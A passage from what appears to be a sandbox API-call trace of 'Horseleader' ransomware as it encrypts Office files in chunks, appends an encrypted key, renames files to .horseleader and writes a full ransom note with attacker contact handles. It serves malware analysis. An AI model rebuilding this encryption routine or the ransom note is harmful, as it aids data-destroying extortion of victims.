Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.940] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 71 [0243.940] StrStrW (lpFirst="ATLCONV.DLL", lpSrch=".txt") returned 0x0 [0243.940] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=385368) returned 1 [0243.940] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.940] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.949] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.949] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2c8ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.949] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.958] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.958] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.958] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x59158, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.958] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.963] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.963] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.964] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.964] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.964] CloseHandle (hObject=0x158) returned 1 [0243.964] GetProcessHeap () returned 0x780000 [0243.964] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.964] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.horseleader") returned 83 [0243.964] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll.horseleader")) returned 1 [0243.965] GetProcessHeap () returned 0x780000 [0243.965] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.965] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb10f7500, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0xda5b0540, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xb10f7500, ftLastWriteTime.dwHighDateTime=0x1cbe56c, nFileSizeHigh=0x0, nFileSizeLow=0x4d67b0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Csi.dll", cAlternateFileName="")) returned 1 [0243.966] lstrcmpiW (lpString1="Csi.dll", lpString2="Windows") returned -1 [0243.966] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 67 [0243.966] StrStrIW (lpFirst="Csi.dll", lpSrch=".horseleader") returned 0x0 [0243.966] lstrcmpW (lpString1="Csi.dll", lpString2="#Decrypt#.txt") returned 1 [0243.966] lstrcmpW (lpString1="Csi.dll", lpString2="_uninstalling_.png") returned 1 [0243.966] lstrlenW (lpString=".testttjffg") returned 11 [0243.966] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll", lpSrch=".testttjffg") returned 0x0 [0243.966] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.966] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.966] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.967] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll") returned 67 [0243.967] StrStrW (lpFirst="Csi.dll", lpSrch=".txt") returned 0x0 [0243.967] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=5072816) returned 1 [0243.967] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.968] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.980] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.981] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.981] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x268bd8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.982] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.985] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.985] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x4d17b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.985] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.988] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.988] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.988] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.988] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0243.988] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0243.989] CloseHandle (hObject=0x158) returned 1 [0243.989] GetProcessHeap () returned 0x780000 [0243.989] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0243.989] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.horseleader") returned 79 [0243.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Csi.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csi.dll.horseleader")) returned 1 [0243.990] GetProcessHeap () returned 0x780000 [0243.991] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0243.991] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef87d800, ftCreationTime.dwHighDateTime=0x1cb8cce, ftLastAccessTime.dwLowDateTime=0xda5d66a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xef87d800, ftLastWriteTime.dwHighDateTime=0x1cb8cce, nFileSizeHigh=0x0, nFileSizeLow=0x1b3980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="CsiSoap.dll", cAlternateFileName="")) returned 1 [0243.991] lstrcmpiW (lpString1="CsiSoap.dll", lpString2="Windows") returned -1 [0243.991] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 71 [0243.991] StrStrIW (lpFirst="CsiSoap.dll", lpSrch=".horseleader") returned 0x0 [0243.991] lstrcmpW (lpString1="CsiSoap.dll", lpString2="#Decrypt#.txt") returned 1 [0243.991] lstrcmpW (lpString1="CsiSoap.dll", lpString2="_uninstalling_.png") returned 1 [0243.991] lstrlenW (lpString=".testttjffg") returned 11 [0243.991] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll", lpSrch=".testttjffg") returned 0x0 [0243.991] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0243.991] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0243.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0243.992] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll") returned 71 [0243.992] StrStrW (lpFirst="CsiSoap.dll", lpSrch=".txt") returned 0x0 [0243.992] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1784192) returned 1 [0243.992] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.992] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.996] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.997] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd74c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.997] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0243.999] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0243.999] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x1ae980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0243.999] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.002] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.002] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.002] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.003] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.003] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.003] CloseHandle (hObject=0x158) returned 1 [0244.004] GetProcessHeap () returned 0x780000 [0244.004] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.004] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.horseleader") returned 83 [0244.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\CsiSoap.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\csisoap.dll.horseleader")) returned 1 [0244.005] GetProcessHeap () returned 0x780000 [0244.005] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.005] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Cultures", cAlternateFileName="")) returned 1 [0244.005] lstrcmpiW (lpString1="Cultures", lpString2="Windows") returned -1 [0244.005] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures") returned 68 [0244.005] lstrcmpW (lpString1="Cultures", lpString2=".") returned 1 [0244.005] lstrcmpW (lpString1="Cultures", lpString2="..") returned 1 [0244.006] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.006] GetProcessHeap () returned 0x780000 [0244.006] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.006] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*") returned 70 [0244.006] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0244.006] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.006] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\.") returned 70 [0244.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.007] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceefecc0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xceefecc0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xceefecc0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName="..", cAlternateFileName="")) returned 1 [0244.007] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\..") returned 71 [0244.007] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.007] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.007] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 1 [0244.007] lstrcmpiW (lpString1="OFFICE.ODF", lpString2="Windows") returned -1 [0244.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF") returned 79 [0244.007] StrStrIW (lpFirst="OFFICE.ODF", lpSrch=".horseleader") returned 0x0 [0244.007] lstrcmpW (lpString1="OFFICE.ODF", lpString2="#Decrypt#.txt") returned 1 [0244.007] lstrcmpW (lpString1="OFFICE.ODF", lpString2="_uninstalling_.png") returned 1 [0244.007] lstrlenW (lpString=".testttjffg") returned 11 [0244.007] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF", lpSrch=".testttjffg") returned 0x0 [0244.007] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0244.007] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0244.008] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\office.odf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.008] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cbc7d00, ftCreationTime.dwHighDateTime=0x1cbe3e3, ftLastAccessTime.dwLowDateTime=0xcef24e20, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x7cbc7d00, ftLastWriteTime.dwHighDateTime=0x1cbe3e3, nFileSizeHigh=0x0, nFileSizeLow=0x419360, dwReserved0=0x995d73de, dwReserved1=0x3d9633d3, cFileName="OFFICE.ODF", cAlternateFileName="")) returned 0 [0244.008] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0244.008] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\#Decrypt#.txt") returned 82 [0244.009] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Cultures\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\cultures\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.009] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.009] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0244.011] lstrlenA 